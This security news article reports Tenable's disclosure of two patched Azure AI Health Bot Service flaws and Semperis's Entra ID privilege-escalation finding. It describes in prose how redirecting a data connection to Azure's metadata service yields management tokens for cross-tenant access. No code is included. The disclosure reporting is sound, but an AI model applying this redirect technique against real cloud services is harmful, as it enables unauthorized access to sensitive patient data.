Researchers Uncover Vulnerabilities in AI-Powered Azure Health Bot Service

by Esmeralda McKenzie
AI-Powered Azure Health Bot Service


Aug 13, 2024Ravie LakshmananHealthcare / Vulnerability

Cybersecurity researchers have discovered two security flaws in Microsoft’s Azure Health Bot Service that, if exploited, could permit a malicious actor to achieve lateral movement within customer environments and access sensitive patient data.

The critical issues, now patched by Microsoft, could have allowed access to cross-tenant resources within the service, Tenable said in a new report shared with The Hacker News.

The Azure AI Health Bot Service is a cloud platform that enables developers in healthcare organizations to build and deploy AI-powered virtual health assistants and create copilots to manage administrative workloads and engage with their patients.

This includes bots created by insurance service providers to allow customers to look up the status of a claim and ask questions about benefits and services, as well as bots managed by healthcare entities to help patients find appropriate care or look up nearby doctors.

Cybersecurity

Tenable’s research specifically focuses on one aspect of the Azure AI Health Bot Service called Data Connections, which, as the name implies, offers a mechanism for integrating data from external sources, be it third parties or the service providers’ own API endpoints.

While the feature has built-in safeguards to prevent unauthorized access to internal APIs, further investigation found that these protections could be bypassed by issuing redirect responses (i.e., 301 or 302 status codes) when configuring a data connection using an external host under one’s control.

By setting up the host to respond to requests with a 301 redirect response destined for Azure’s metadata service (IMDS), Tenable said it was possible to obtain a valid metadata response and then get hold of an access token for management.azure[.]com.

The token could then be used to list the subscriptions that it provides access to by means of a call to a Microsoft endpoint that, in turn, returns an internal subscription ID, which could ultimately be leveraged to list the accessible resources by calling another API.

Separately, it was also discovered that another endpoint related to integrating systems that support the Fast Healthcare Interoperability Resources (FHIR) data exchange format was susceptible to the same attack as well.

Tenable said it reported its findings to Microsoft in June and July 2024, following which the Windows maker began rolling out fixes to all regions. There is no evidence that the issue was exploited in the wild.

Cybersecurity

“The vulnerabilities raise concerns about how chatbots can be exploited to reveal sensitive information,” Tenable said in a statement. “In particular, the vulnerabilities involved a flaw in the underlying architecture of the chatbot service, highlighting the importance of traditional web app and cloud security in the age of AI chatbots.”

The disclosure comes days after Semperis detailed an attack technique called UnOAuthorized that allows for privilege escalation using Microsoft Entra ID (formerly Azure Active Directory), including the ability to add and remove users from privileged roles. Microsoft has since plugged the security hole.

“A threat actor could have used such access to perform privilege elevation to Global Administrator and install further means of persistence in a tenant,” security researcher Eric Woodruff said. “An attacker could also use this access to perform lateral movement into any system in Microsoft 365 or Azure, as well as any SaaS application connected to Entra ID.”

Found this article interesting? Follow us on Twitter and LinkedIn to read more exclusive content we post.



Related Posts